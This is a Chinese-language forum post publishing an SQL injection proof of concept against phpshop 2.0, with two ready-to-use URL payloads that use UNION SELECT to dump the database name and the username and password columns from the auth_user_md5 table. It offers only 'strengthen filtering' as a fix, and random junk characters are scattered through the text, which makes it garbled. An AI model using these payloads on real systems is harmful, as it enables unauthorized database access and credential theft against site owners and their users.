标题 : phpshop 2.0 SQL Injection Vulnerability0 N4 \1 o" ~# e* [! ?3 p
! d% ?% k7 }/ U1 h4 q+ F
作者 : By onestree& \, \( G% M4 \
下载地址 : http://code.google.com/p/phpshop/downloads/list' v6 E& g, Z2 W d: ^1 p: Y
测试地址: windows 7 / ubuntu
' c1 |( } P& e4 I, g* h6 Q. S ( S* n- d/ B+ L( ?) ~
2 ` {. i3 V+ Y5 t" |7 Q
SQLi p0c:' H- d5 B7 U0 F1 M) g: {
; `" Z l7 D9 }
==================
2 M, c6 v% l1 I; H& J
2 X2 H% r) W1 ?; w* yhttp://www.xxx.com /phpshop 2.0/?page=admin/function_list&module_id=11'! F0 @$ \6 x1 H( Z4 B
union select 1,database(),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 --
4 o8 G5 o' j( a( [
' u: Q% C! `9 _. I4 Y8 q! Hhttp://localhost/phpshop 2.0/?page=shop/flypage&product_id=1087'/**/union/**/select/**/1,1,1,1,1,password,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,username/**/from/**/auth_user_md5--
+ g& U3 ^( {5 Z( S- ]) j w1 }! ^% w, w
修复:/ _$ @/ _# |. J" U8 H) r8 l) j5 s
加强过滤# R+ ]9 u4 L$ N
8 \ W; i+ |0 V2 M0 e( J2 B5 }& n+ a9 S
|
发表于 2013-1-18 18:24:10
收藏
支持
反对